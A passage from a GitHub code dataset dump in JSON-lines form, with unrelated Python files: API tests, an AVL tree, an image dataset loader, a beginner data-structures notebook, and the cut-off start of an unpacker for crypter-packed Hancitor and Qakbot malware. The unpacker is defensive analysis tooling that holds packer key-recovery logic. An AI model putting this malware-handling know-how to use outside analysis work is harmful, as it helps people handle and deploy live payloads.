self.assertEquals(json_get[field], put_data[field],\n 'mismatch on field ' + field + ' in GET response')\n\n def test_delete_recreate_user(self):\n \"\"\"Create and delete a user, assert that the user no longer exists, and can be created\n again.\"\"\"\n rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_create, 201)\n user_id = rv_create.json()['id']\n\n rv_delete = self.delete(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertJsonAndStatus(rv_delete, 200)\n\n rv_get = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertEquals(rv_get.status_code, 404)\n\n rv_recreate = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_recreate, 201)\n\n def test_create_login_permission_logout(self):\n \"\"\"Create a user, login, test permissions, and logout.\"\"\"\n rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_create, 201)\n user_id = rv_create.json()['id']\n\n # Log in with bad password\n rv_login_failed = self.post_json(\n self.iam_endpoint + '/v1/login',\n {'login': self.ref_user['login'],\n 'password_hash': hashlib.sha1('qwerty').hexdigest()},\n self.session)\n self.assertEquals(rv_login_failed.status_code, 404)\n\n # Log in\n rv_login = self.post_json(\n self.iam_endpoint + '/v1/login',\n {'login': self.ref_user['login'],\n 'password_hash': hashlib.sha1(self.ref_user['password_hash']).hexdigest()},\n self.session)\n self.assertJsonAndStatus(rv_login, 200)\n session_id = rv_login.json()['session_id']\n\n # Check a granted permission\n rv_permission_1 = self.get(\n self.iam_endpoint + '/v1/sessions/{}/{}/permission/{}/{}'.format(\n user_id, session_id, 'read', 'own_transaction'\n ))\n self.assertJsonAndStatus(rv_permission_1, 200)\n self.assertTrue(rv_permission_1.json()['allowed'])\n\n # Check a denied permission\n rv_permission_2 = self.get(\n self.iam_endpoint + '/v1/sessions/{}/{}/permission/{}/{}'.format(\n user_id, session_id, 'read', 'transaction'\n ))\n self.assertJsonAndStatus(rv_permission_1, 200)\n self.assertFalse(rv_permission_2.json()['allowed'])\n\n # Check a non-existing permission\n rv_permission_3 = self.get(\n self.iam_endpoint + '/v1/sessions/{}/{}/permission/{}/{}'.format(\n user_id, session_id, 'dummy', 'dummy'\n ))\n self.assertEquals(404, rv_permission_3.status_code)\n\n # Log out\n rv_logout = self.post_json(self.iam_endpoint + '/v1/sessions/' + session_id + '/logout',\n self.session)\n self.assertEquals(200, rv_logout.status_code)\n\n # Check that the session no longer exists\n rv_session = self.get(self.iam_endpoint + '/v1/sessions/' + session_id)\n self.assertEquals(404, rv_session.status_code)\n\n def test_search(self):\n \"\"\" Create an entity with a user in it, search the user twice:\n * first find him\n * second don't find him\n \"\"\"\n # Create\n rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_create, 201)\n user_id = rv_create.json()['id']\n\n # Find him\n rv_search_find = self.get(self.iam_endpoint + '/v1/users?login=john.doe')\n users = rv_search_find.json()['users']\n self.assertEquals(1, len(users))\n self.assertEquals(user_id, users[0]['id'])\n\n # Doesn't\n rv_search_not_found = self.get(self.iam_endpoint + '/v1/users?first_name=alex')\n no_user = rv_search_not_found.json()['users']\n self.assertEquals(0, len(no_user))\n\n def test_put_delete_entity(self):\n \"\"\"\n Create an entity, PUT it, add a user delete the entity and check that the user is deleted.\n \"\"\"\n\n # Edit the entity, then get it and assert the name was modified\n entity_id = self.ref_user['entity_id']\n rv_put = self.put_json(self.iam_endpoint + '/v1/entities/' + entity_id,\n {'name': 'Centrale-Supelec'},\n self.session)\n self.assertJsonAndStatus(rv_put, 200)\n\n rv_get_entity = self.get(self.iam_endpoint + '/v1/entities/' + entity_id)\n self.assertJsonAndStatus(rv_get_entity, 200)\n self.assertEquals('Centrale-Supelec', rv_get_entity.json()['name'])\n\n # Add a user\n rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_create, 201)\n user_id = rv_create.json()['id']\n\n # Delete the entity and assert the user no longer exists\n rv_delete = self.delete(self.iam_endpoint + '/v1/entities/' + entity_id)\n self.assertEquals(200, rv_delete.status_code)\n\n rv_get_user = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertEquals(404, rv_get_user.status_code)\n","repo_name":"PageLib/ws","sub_path":"test/test_iam.py","file_name":"test_iam.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3662559622","text":"from binarytree import Node\nfrom timeit import timeit\nimport sys\n\nsys.setrecursionlimit(20000) # sets recursion to make sure big trees dosen't\n# have a problem with reccursion in pytohn\n\n\nclass AvlTree:\n def __init__(self, num_list):\n self.__root = Node(num_list[0])\n for num in num_list[1:]:\n self.AVLinsert(num)\n\n def rebalance(self, balance, key, node):\n \"\"\"\n performs rebalance if needed\n args:\n balance - int with current balance\n key - current key\n node - node to rebalance\n returns:\n node - new or old node\n \"\"\"\n if balance > 1:\n if key < node.left.value:\n return self.rightRotate(node)\n if key > node.left.value:\n node.left = self.leftRotate(node.left)\n return self.rightRotate(node)\n if balance < -1:\n if key > node.right.value:\n return self.leftRotate(node)\n if key < node.right.value:\n node.right = self.rightRotate(node.right)\n return self.leftRotate(node)\n\n return node\n\n def leftRotate(self, node):\n \"\"\"\n left rotation\n args:\n node - node to prefrom rotation\n retuns:\n node - new node after rotation\n \"\"\"\n new_node = node.right\n templ = new_node.left\n\n new_node.left = node\n node.right = templ\n\n node.height = 1 + max(self.get_height(node.left),\n self.get_height(node.right))\n new_node.height = 1 + max(self.get_height(new_node.left),\n self.get_height(new_node.right))\n # Return the new node\n return new_node\n\n def rightRotate(self, node):\n \"\"\"\n right rotation\n args:\n node - node to prefrom rotation\n retuns:\n node - new node after rotation\n \"\"\"\n new_node = node.left\n tempr = new_node.right\n\n new_node.right = node\n node.left = tempr\n\n node.height = 1 + max(self.get_height(node.left),\n self.get_height(node.right))\n new_node.height = 1 + max(self.get_height(new_node.left),\n self.get_height(new_node.right))\n\n # Return the new node\n return new_node\n\n def _AVLinsert(self, node, key):\n \"\"\"\n Insert methode - inserts node into tree, if key is a duplicate\n intreases counter, inestion rules as avl, pertforms rebalance\n if needed\n Args:\n value - value to inster\n node - node to start insert from\n returns:\n node - new node as node given\n \"\"\"\n if key == node.value:\n node.counter = key\n return node\n elif key < node.value:\n if node.left is None:\n node.left = Node(key)\n else:\n node.left = self._AVLinsert(node.left, key)\n else:\n if node.right is None:\n node.right = Node(key)\n else:\n node.right = self._AVLinsert(node.right, key)\n\n node.height = 1 + max(self.get_height(node.left),\n self.get_height(node.right))\n\n balance = self.get_balance(node)\n\n node = self.rebalance(balance, key, node)\n return node\n\n def AVLinsert(self, key):\n \"\"\"\n inster methode - uses private insert and changes root if needed\n Args:\n key - key to insert\n Returns:\n nothing\n \"\"\"\n self.__root = self._AVLinsert(self.__root, key)\n\n def pre_order_list(self):\n \"\"\"\n pre order traversal - node, left, right\n Args:\n node - node to start traversal from\n returns:\n list - list with values from tree\n \"\"\"\n return self.__root.pre_order_list(self.__root)\n\n def in_order_list(self):\n \"\"\"\n in order traversal - left, node, right\n Args:\n node - node to start traversal from\n returns:\n list - list with values from tree\n \"\"\"\n return self.__root.in_order_list(self.__root)\n\n def get_root(self):\n return self.__root\n\n def get_height(self, node):\n if node is None:\n return 0\n return node.height\n\n def get_balance(self, node):\n \"\"\"\n returns balnce - it means divrence between left height and right height\n args:\n node - node to get balance from\n returns:\n balance - int\n \"\"\"\n if node is None:\n return 0\n return self.get_height(node.left) - self.get_height(node.right)\n\n def search(self, key):\n \"\"\"\n Search methode - uses search root's node function\n Args:\n key - value to find\n returns:\n node with that value\n \"\"\"\n return self.__root.search(key)\n\n\ndef avltree_creation_time(numbers):\n setupcode = '''\nfrom avltree import AvlTree\n '''\n MYSTML = f'AvlTree({numbers})'\n return timeit(setup=setupcode, stmt=MYSTML, number=100)\n\n\ndef avltree_search_time(numbers):\n times = []\n setupcode = f'from avltree import AvlTree\\navl = AvlTree({numbers})'\n for i in range(1, 10000):\n MYSTML = f'avl.search({numbers[i]})'\n times.append(timeit(setup=setupcode, stmt=MYSTML, number=10))\n return times\n","repo_name":"noFrostoo/aisdi-pw","sub_path":"Trees/avltree.py","file_name":"avltree.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72735610348","text":"\"\"\"Intergation tests for ``cockpit.quantities``.\"\"\"\n\nimport pytest\n\nfrom cockpit import quantities\nfrom cockpit.quantities import __all__\nfrom cockpit.quantities.quantity import SingleStepQuantity, TwoStepQuantity\nfrom cockpit.utils.schedules import linear\nfrom tests.test_quantities.settings import PROBLEMS, PROBLEMS_IDS\nfrom tests.utils.harness import SimpleTestHarness\nfrom tests.utils.problem import instantiate\n\nQUANTITIES = [\n getattr(quantities, q)\n for q in __all__\n if q != \"Quantity\"\n and q != \"SingleStepQuantity\"\n and q != \"TwoStepQuantity\"\n and q != \"ByproductQuantity\"\n]\nIDS = [q_cls.__name__ for q_cls in QUANTITIES]\n\n\n@pytest.mark.parametrize(\"problem\", PROBLEMS, ids=PROBLEMS_IDS)\n@pytest.mark.parametrize(\"quantity_cls\", QUANTITIES, ids=IDS)\ndef test_quantity_integration_and_track_events(problem, quantity_cls):\n \"\"\"Check if ``Cockpit`` with a single quantity works.\n\n Args:\n problem (tests.utils.Problem): Settings for train loop.\n quantity_cls (Class): Quantity class that should be tested.\n \"\"\"\n interval, offset = 1, 2\n schedule = linear(interval, offset=offset)\n quantity = quantity_cls(track_schedule=schedule, verbose=True)\n\n with instantiate(problem):\n iterations = problem.iterations\n testing_harness = SimpleTestHarness(problem)\n cockpit_kwargs = {\"quantities\": [quantity]}\n testing_harness.test(cockpit_kwargs)\n\n def is_track_event(iteration):\n if isinstance(quantity, SingleStepQuantity):\n return schedule(iteration)\n elif isinstance(quantity, TwoStepQuantity):\n end_iter = quantity.SAVE_SHIFT + iteration\n return quantity.is_end(end_iter) and end_iter < iterations\n else:\n raise ValueError(f\"Unknown quantity: {quantity}\")\n\n track_events = sorted(i for i in range(iterations) if is_track_event(i))\n output_events = sorted(quantity.get_output().keys())\n\n assert output_events == track_events\n","repo_name":"f-dangel/cockpit","sub_path":"tests/test_quantities/test_quantity_integration.py","file_name":"test_quantity_integration.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":453,"dataset":"github-code","pt":"37"} +{"seq_id":"7396137051","text":"a = []\n\ntype(a)\n\n\n# In[2]:\n\n\nhelp(a)\n\n\n# In[2]:\n\n\n# mutable means it is editable\n\na = [1,2,3]\n\na.append(4)\n\nprint(a)\n\n\n# In[3]:\n\n\n# accessing list elements\n\na[0]\n\n\n# In[4]:\n\n\na[3]\n\n\n# In[5]:\n\n\na[-1]\n\n\n# In[7]:\n\n\nprint(len(a))\na[4]\n\n\n# In[9]:\n\n\n# extract sublist\n\na[2:3] # last element is not included\n\n\n# In[10]:\n\n\na[1:]\n\n\n# In[13]:\n\n\na[:2]\n\n\n# In[14]:\n\n\na[:] # copy of list\n\n\n# In[4]:\n\n\na.clear()\n\na\n\n\n# In[5]:\n\n\na = [1,2,4,3]\n\na.sort()\n\na\n\n\n# In[10]:\n\n\nfor x in a:\n print(x+10)\n\n\n# In[6]:\n\n\n# list comprehensions are in-line lists\n\nb = [x+10 for x in a]\n\nb\n\n\n# In[16]:\n\n\nlist_of_names = ['Janet', 'Mike','Charlie','Henry', 'Jane']\n\n# String concatenation also works.\nlist_of_fullnames = [x+\" Doe\" for x in list_of_names]\n\nlist_of_fullnames\n\n\n# # dictionary\n\n# In[12]:\n\n\nd = {}\n\ntype(d)\n\n\n# In[13]:\n\n\nhelp(d)\n\n\n# In[26]:\n\n\n# There are two key ways to initialize a dictionary.\n\nx = {'one': 1, 'two': 2, 'three': 3}\nprint(x)\nx = dict(one=1,two=2,three=3)\nx\n\n\n# In[17]:\n\n\nx['one']\nx['two']\n\n\n# In[18]:\n\n\nx.get('one')\n\n\n# In[19]:\n\n\nx['four']\n\n\n# In[23]:\n\n\nfour = x.get('four')\ntype(four)\n\n\n# In[24]:\n\n\nif four is None:\n print(\"four is not in dictionary x\")\n\n\n# In[27]:\n\n\ndictionary = {'listitems': [1,2,3], 'string': \"hello!!\"}\n\n\n# In[29]:\n\n\nfor key, items in dictionary.items():\n print(key, items)\n\n\n# # set\n\n# In[33]:\n\n\nempty_set = set()\nnumbers = set([1,2,3,4])\nhelp(set)\n\n\n# In[34]:\n\n\na = set([1,2,3])\nb = set([4,5,6])\na.union(b)\n\n\n# In[37]:\n\n\nfor x in a:\n print(x)\n\n\n# In[41]:\n\n\nnew_set = set(\"HiwidiTheOrder\")\n[x for x in new_set] # in general order is not preserved!\n\n\n# # tuple\n\n# In[43]:\n\n\nx = (1,)\ntype(x)\n\n\n# In[44]:\n\n\nhelp(tuple)\n\n\n# In[50]:\n\n\nx = (1,2,3,4,)\nx[0]\n\n\n# In[52]:\n\n\n# tuples are immutable\n\nx[0] = 3\n\n\n# # special containers\n# \n# ### OrderdDict\n\n# In[55]:\n\n\nimport collections\n\nspecial_collections = [ x for x in dir(collections) if x[0]!='_']\nprint(special_collections)\n\n\n# In[56]:\n\n\nhelp(collections.OrderedDict)\n\n\n# In[73]:\n\n\nregular_dict = {'one': 1, 'two': 2, 'three': 3, 'four': 4}\nordered_dict = collections.OrderedDict(one=1, two=2, three=3, four=4)\n\n[x for x in ordered_dict]\n[x for x in regular_dict]\n\n\n# In[75]:\n\n\nordered_dict.popitem()\n\n\n# In[76]:\n\n\nordered_dict\n\n","repo_name":"cfd113311/python595","sub_path":"lec02/basic_data_structures.py","file_name":"basic_data_structures.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"12569596255","text":"import re\n\nimport numpy as np\nimport torch\nfrom PIL import Image\n\nfrom config import *\nfrom dataset.tsv_cond_dataset import TsvCondImgCompositeDataset\n\n\nclass BaseDataset(TsvCondImgCompositeDataset):\n def __init__(self, args, yaml_file, split=\"train\", preprocesser=None):\n self.img_size = getattr(args, \"img_full_size\", args.img_size)\n self.basic_root_dir = BasicArgs.root_dir\n self.max_video_len = args.max_video_len\n assert self.max_video_len == 1\n self.fps = args.fps\n self.dataset = \"TiktokDance-Image\"\n self.preprocesser = preprocesser\n if not hasattr(args, \"ref_mode\"):\n args.ref_mode = \"first\"\n\n super().__init__(\n args, yaml_file, split=split, size_frame=args.max_video_len, tokzr=None\n )\n self.eval_sample_interval = args.eval_sample_interval\n self.train_sample_interval = args.train_sample_interval\n self.img_key_dict = {key: i for i, key in enumerate(self.image_keys)}\n self.data_dir = args.data_dir\n self.img_ratio = (\n (1.0, 1.0)\n if not hasattr(self.args, \"img_ratio\") or self.args.img_ratio is None\n else self.args.img_ratio\n )\n self.img_scale = (\n (1.0, 1.0)\n if not split == \"train\"\n else getattr(self.args, \"img_scale\", (0.9, 1.0))\n ) # val set should keep scale=1.0 to avoid the random crop\n print(\n f\"Current Data: {split}; Use image scale: {self.img_scale}; Use image ratio: {self.img_ratio}\"\n )\n\n self.transform = transforms.Compose(\n [\n transforms.RandomResizedCrop(\n self.img_size,\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BILINEAR,\n ),\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5]),\n ]\n )\n try:\n self.ref_transform = transforms.Compose(\n [ # follow CLIP transform\n transforms.ToTensor(),\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n antialias=False,\n ),\n transforms.Normalize(\n [0.48145466, 0.4578275, 0.40821073],\n [0.26862954, 0.26130258, 0.27577711],\n ),\n ]\n )\n self.ref_transform_mask = transforms.Compose(\n [ # follow CLIP transform\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n antialias=False,\n ),\n transforms.ToTensor(),\n ]\n )\n except:\n print(\"### Current pt version not support antialias, thus remove it! ###\")\n self.ref_transform = transforms.Compose(\n [ # follow CLIP transform\n transforms.ToTensor(),\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n ),\n transforms.Normalize(\n [0.48145466, 0.4578275, 0.40821073],\n [0.26862954, 0.26130258, 0.27577711],\n ),\n ]\n )\n self.ref_transform_mask = transforms.Compose(\n [ # follow CLIP transform\n transforms.RandomResizedCrop(\n (224, 224),\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BICUBIC,\n ),\n transforms.ToTensor(),\n ]\n )\n self.cond_transform = transforms.Compose(\n [\n transforms.RandomResizedCrop(\n self.img_size,\n scale=self.img_scale,\n ratio=self.img_ratio,\n interpolation=transforms.InterpolationMode.BILINEAR,\n ),\n transforms.ToTensor(),\n ]\n )\n\n def add_mask_to_img(self, img, mask, img_key): # pil, pil\n if not img.size == mask.size:\n # import pdb; pdb.set_trace()\n # print(f'Reference image ({img_key}) size ({img.size}) is different from the mask size ({mask.size}), therefore try to resize the mask')\n mask = mask.resize(img.size) # resize the mask\n mask_array = np.array(mask)\n img_array = np.array(img)\n mask_array[mask_array < 127.5] = 0\n mask_array[mask_array > 127.5] = 1\n return Image.fromarray(img_array * mask_array), Image.fromarray(\n img_array * (1 - mask_array)\n ) # foreground, background\n\n def augmentation(self, frame, transform, state=None):\n if state is not None:\n torch.set_rng_state(state)\n return transform(frame)\n\n def _get_frame_idx_seq(self, start_img_key, nframes: int, frame_interval: int):\n format1 = r\"^(.*TiktokDance_\\d+_)(\\d+)(\\.\\w+)$\"\n format2 = r\"^(TiktokDance_\\d+_\\d+_1x1_)(\\d+)(\\.\\w+)$\"\n format3 = r\"^(.*_TiktokDance_[a-z0-9]+_\\d+_)(\\d+)(\\.\\w+)$\"\n format4 = r\"^(?!.*TiktokDance)([^_]+_)(\\d+)$\" # NTU dataset\n match1 = re.match(format1, start_img_key)\n match2 = re.match(format2, start_img_key)\n match3 = re.match(format3, start_img_key)\n match4 = re.match(format4, start_img_key)\n if match1:\n prefix, start_frame_idx, suffix = match1.groups()\n elif match2:\n prefix, start_frame_idx, suffix = match2.groups()\n elif match3:\n prefix, start_frame_idx, suffix = match3.groups()\n elif match4:\n prefix, start_frame_idx = match4.groups()\n suffix = \"\"\n else:\n raise IndexError(f\"failed to parse {start_img_key}\")\n\n start_frame_idx_int = int(start_frame_idx)\n img_idx_seq = []\n for i in range(nframes):\n frame_idx = str(start_frame_idx_int + i * frame_interval).zfill(\n len(start_frame_idx)\n )\n img_key = prefix + frame_idx + suffix\n if img_key not in self.img_key_dict:\n return False, None\n img_idx_seq.append(self.img_key_dict[img_key])\n return True, img_idx_seq\n\n def get_metadata(self, idx):\n while True:\n img_idx, cap_idx = self.get_image_cap_index(idx)\n status, frame_idx_seq = self._get_frame_idx_seq(\n self.image_keys[img_idx], self.args.nframes, self.args.frame_interval\n )\n if status:\n break\n idx -= 1\n\n frame_seq = []\n img_key_seq = []\n for frame_idx in frame_idx_seq:\n img_key = self.image_keys[frame_idx]\n frame, _ = self.get_visual_data(frame_idx)\n frame_seq.append(frame)\n img_key_seq.append(img_key)\n\n pose_img_seq = []\n for frame_idx in frame_idx_seq:\n pose_img = self.get_cond(frame_idx, \"poses\")\n pose_img_seq.append(pose_img)\n\n # preparing outputs\n meta_data = {}\n meta_data[\"img_seq\"] = frame_seq\n meta_data[\"img_key_seq\"] = img_key_seq\n meta_data[\"pose_img_seq\"] = pose_img_seq\n\n ref_img_idx = self.get_reference_frame_idx(img_idx)\n meta_data[\"ref_img_key\"] = self.image_keys[ref_img_idx]\n meta_data[\"ref_img\"], _ = self.get_visual_data(ref_img_idx)\n meta_data[\"ref_mask\"] = self.get_cond(ref_img_idx, \"masks\")\n meta_data[\"bg_ref_img_key\"] = meta_data[\"ref_img_key\"]\n meta_data[\"bg_ref_img\"] = meta_data[\"ref_img\"]\n meta_data[\"bg_ref_mask\"] = meta_data[\"ref_mask\"]\n\n return meta_data\n\n def get_reference_frame_idx(self, img_idx):\n def _get_first_frame_img_key(prefix, frame_idx, suffix):\n new_frame_idx = str(1).zfill(len(frame_idx))\n result = prefix + new_frame_idx + suffix\n if result in self.img_key_dict.keys():\n return result\n else:\n keys = [key for key in self.img_key_dict.keys() if prefix in key]\n keys = sorted(keys)\n return keys[0]\n\n img_key = self.image_keys[img_idx]\n format1 = r\"^(.*TiktokDance_\\d+_)(\\d+)(\\.\\w+)$\"\n format2 = r\"^(TiktokDance_\\d+_\\d+_1x1_)(\\d+)(\\.\\w+)$\"\n format3 = r\"^(.*_TiktokDance_[a-z0-9]+_\\d+_)(\\d+)(\\.\\w+)$\"\n format4 = r\"^(?!.*TiktokDance)([^_]+_)(\\d+)$\" # NTU dataset\n match1 = re.match(format1, img_key)\n match2 = re.match(format2, img_key)\n match3 = re.match(format3, img_key)\n match4 = re.match(format4, img_key)\n if match1:\n prefix, frame_idx, suffix = match1.groups()\n # print(f\"{img_key} matched to match1, {prefix}, {frame_idx}, {suffix}\")\n elif match2:\n prefix, frame_idx, suffix = match2.groups()\n # print(f\"{img_key} matched to match2, {prefix}, {frame_idx}, {suffix}\")\n elif match3:\n prefix, frame_idx, suffix = match3.groups()\n # print(f\"{img_key} matched to match3, {prefix}, {frame_idx}, {suffix}\")\n elif match4:\n prefix, frame_idx = match4.groups()\n suffix = \"\"\n # print(f\"{img_key} matched to match4, {prefix}, {frame_idx}\")\n else:\n print(\"failed to match the image key: \", img_key)\n return super().get_reference_frame_idx(img_idx)\n\n try:\n if self.args.ref_mode == \"first\" or self.split != \"train\":\n new_img_key = _get_first_frame_img_key(prefix, frame_idx, suffix)\n else:\n valid_img_keys = [x for x in self.img_key_dict.keys() if prefix in x]\n if self.args.ref_mode == \"random\":\n new_img_key = random.choice(valid_img_keys)\n elif self.args.ref_mode == \"random_sparse\":\n new_img_key = random.choice(valid_img_keys[::30])\n elif self.args.ref_mode == \"random_sparse_part\":\n if random.random() < 0.2:\n new_img_key = random.choice(valid_img_keys[::30])\n else:\n new_img_key = _get_first_frame_img_key(\n prefix, frame_idx, suffix\n )\n except:\n new_img_key = _get_first_frame_img_key(prefix, frame_idx, suffix)\n return self.img_key_dict[new_img_key]\n\n def get_visual_data(self, img_idx):\n try:\n row = self.get_row_from_tsv(self.visual_tsv, img_idx)\n return self.str2img(row[-1]), False\n except Exception as e:\n raise ValueError(f\"{e}, in get_visual_data()\")\n\n def __len__(self):\n if self.split == \"train\":\n if getattr(self.args, \"max_train_samples\", None):\n return min(self.args.max_train_samples, super().__len__())\n else:\n return int(super().__len__() // self.train_sample_interval)\n else:\n if getattr(self.args, \"max_eval_samples\", None):\n return min(self.args.max_eval_samples, super().__len__())\n else:\n return int(super().__len__() // self.eval_sample_interval)\n\n def __getitem__(self, idx):\n if self.split == \"train\":\n idx = int(idx * self.train_sample_interval)\n idx = idx + random.randint(0, self.train_sample_interval - 1)\n idx = min(idx, len(self) - 1)\n elif self.split == \"eval\":\n idx = int(idx * self.eval_sample_interval)\n\n raw_data = self.get_metadata(idx)\n img_seq = raw_data[\"img_seq\"]\n pose_img_seq = raw_data[\"pose_img_seq\"]\n fg_img = raw_data[\"ref_img\"]\n bg_img = raw_data[\"bg_ref_img\"]\n\n state = torch.get_rng_state()\n fg_state = state\n aug_img_seq = []\n for img in img_seq:\n img = self.augmentation(img, self.transform, state)\n aug_img_seq.append(img)\n aug_img_seq = torch.stack(aug_img_seq, dim=1)\n aug_pose_img_seq = []\n for pose_img in pose_img_seq:\n pose_img = self.augmentation(pose_img, self.cond_transform, state)\n aug_pose_img_seq.append(pose_img)\n aug_pose_img_seq = torch.stack(aug_pose_img_seq, dim=1)\n if getattr(self.args, \"refer_clip_preprocess\", None):\n raise NotImplementedError\n fg_img = self.preprocesser(fg_img).pixel_values[0] # use clip preprocess\n else:\n fg_img = self.augmentation(fg_img, self.ref_transform, fg_state)\n bg_img = self.augmentation(bg_img, self.transform, state)\n\n if self.args.combine_use_mask: # True\n ref_mask = raw_data[\"ref_mask\"]\n bg_ref_mask = raw_data[\"bg_ref_mask\"]\n assert not getattr(\n self.args, \"refer_clip_preprocess\", None\n ) # mask not support the CLIP process\n\n ### first resize mask to the img size\n ref_mask = ref_mask.resize(raw_data[\"ref_img\"].size)\n bg_ref_mask = bg_ref_mask.resize(raw_data[\"bg_ref_img\"].size)\n\n ref_mask = self.augmentation(ref_mask, self.ref_transform_mask, fg_state)\n bg_ref_mask = self.augmentation(\n bg_ref_mask, self.cond_transform, state\n ) # controlnet path input\n\n # apply the mask\n fg_img = fg_img * ref_mask # foreground\n bg_img = bg_img * (1 - bg_ref_mask) # background\n\n # caption = raw_data[\"caption\"]\n outputs = {\n \"img_key_seq\": \";\".join(raw_data[\"img_key_seq\"]),\n # \"input_text\": caption,\n \"label_img_seq\": aug_img_seq, # ground truth\n \"cond_img_seq\": aug_pose_img_seq, # pose\n \"reference_img\": fg_img, # foreground\n \"reference_img_controlnet\": bg_img, # background\n }\n\n return outputs\n","repo_name":"Wangt-CN/DisCo","sub_path":"dataset/tiktok_video_dataset.py","file_name":"tiktok_video_dataset.py","file_ext":"py","file_size_in_byte":14631,"program_lang":"python","lang":"en","doc_type":"code","stars":655,"dataset":"github-code","pt":"37"} +{"seq_id":"22127400191","text":"#!/usr/bin/env python3\nimport hashlib\nimport logging\nimport traceback\nimport os\nimport re\nimport sys\nimport pefile\nfrom binascii import hexlify, unhexlify\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\nrepo_root = Path(os.path.realpath(__file__)).parent.parent.absolute()\nlib = os.path.join(repo_root, 'lib')\nsys.path.append(lib)\nfrom utils import *\n\ndef parse_args():\n usage = \"unpack.py [OPTION]... [FILES]...\"\n arg_parser = ArgumentParser(description=usage)\n arg_parser.add_argument(\"-d\", \"--dump\", dest=\"dump_dir\", action=\"store\", default=None,\n help=\"Dump path for unpacked payloads\")\n arg_parser.add_argument('-v', '--verbose', action='count', default=0, \n help='Increase verbosity. Can specify multiple times for more verbose output')\n arg_parser.add_argument('-y', '--yara', action='store_true', default=False, \n help='Only unpack files matching the yara rule Classification_Resource_Crypter.yar')\n arg_parser.add_argument('files', nargs='+')\n return arg_parser.parse_args()\n\ndef configure_logger(log_level):\n log_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'unpacker.log')\n log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG}\n log_level = min(max(log_level, 0), 3) #clamp to 0-3 inclusive\n logging.basicConfig(level=log_levels[log_level], \n format='%(asctime)s - %(name)s - %(levelname)-8s %(message)s',\n handlers=[\n logging.FileHandler(log_file, 'a'),\n logging.StreamHandler()\n ])\n\nclass Decryptor:\n\n def __init__(self, dump=None):\n self.logger = logging.getLogger('CryptOne Unpacker')\n self.unpacked_pe = None\n self.unpacked = None\n self.config = []\n self.c2s = []\n self.decrypted_strings = {}\n self.path = None\n self.unpacker = None\n self.potential_keys = []\n self.dump=dump\n \"\"\"\n 021D7AA0 | 8B15 60BC1D02 | mov edx,dword ptr ds:[] |\n 021D7AA6 | 81C2 8AA50800 | add edx,8A58A |\n 021D7AAC | 0315 4CBC1D02 | add edx,dword ptr ds:[] | 021DBC4C:\"ªl@\"\n \"\"\"\n self.regex = re.compile(b'\\x8B.(?P....)\\x81[\\xC0-\\xC3\\xC4-\\xC7](?P....)')\n\n def dump_path(self, data):\n fname = hashlib.md5(data).hexdigest()\n self.logger.debug(f'Beginning of file: {hexlify(data[:32]).decode()}')\n try:\n pe = pefile.PE(data=data)\n if pe.is_dll():\n fname += '.dll'\n elif pe.is_driver(): \n fname += '.sys'\n else:\n fname += '.exe'\n except:\n print(traceback.format_exc())\n\n exit()\n if self.data[:2] == b'\\xd0\\xcf':\n fname += '.ole'\n else:\n fname += '.bin'\n\n if not self.dump:\n #dump file back to path it originated from\n #print(os.path.basename(self.path))\n return os.path.join(os.path.dirname(self.path), fname)\n else:\n os.makedirs(self.dump, exist_ok=True)\n return os.path.join(self.dump, fname)\n\n def block_copy(self, data, bs, skip):\n result = bytearray()\n for i in range(len(data)//bs):\n #print(f'copying from {i*(bs+skip):X} to {i*(bs+skip)+bs:X}')\n result += data[i*(bs+skip):i*(bs+skip)+bs]\n return result\n \n \n def solve(self, ciphertext):\n # In all observed packed Hancitor and Qakbot samples so far, the plaintext begins with ~40 bytes of 0x24\n dword = int.from_bytes(ciphertext[0:4], byteorder='little')\n yield 0x24242424 ^ dword\n yield 0x50746547 ^ dword\n \n\n def decrypt(self, const, data):\n #make a copy\n result = data[:]\n for i in range(0, len(data), 4):\n x = int.from_bytes(result[i:i+4], byteorder='little', signed=False)\n x = ((x+i) & 0xFFFFFFFF)\n x ^= ((const+i) & 0xFFFFFFFF)\n result[i:i+4] = x.to_bytes(4, byteorder='little', signed=False)\n return result\n\n def decrypt_ciphertext(self, ciphertext, resource_name, bs=None, skip=None):\n \"\"\"\n Find the key for the provided ciphertext and attempt to decrypt it\n Dump to the configured path\n \"\"\"\n for const in self.solve(ciphertext):\n for match in self.regex.finditer(self.data):\n #self.logger.debug(f'Attempting to decrypt with add key 0x{const:08X}')\n unpacked_data = self.decrypt(const, ciphertext)\n #self.logger.debug(f'decrypted resource: 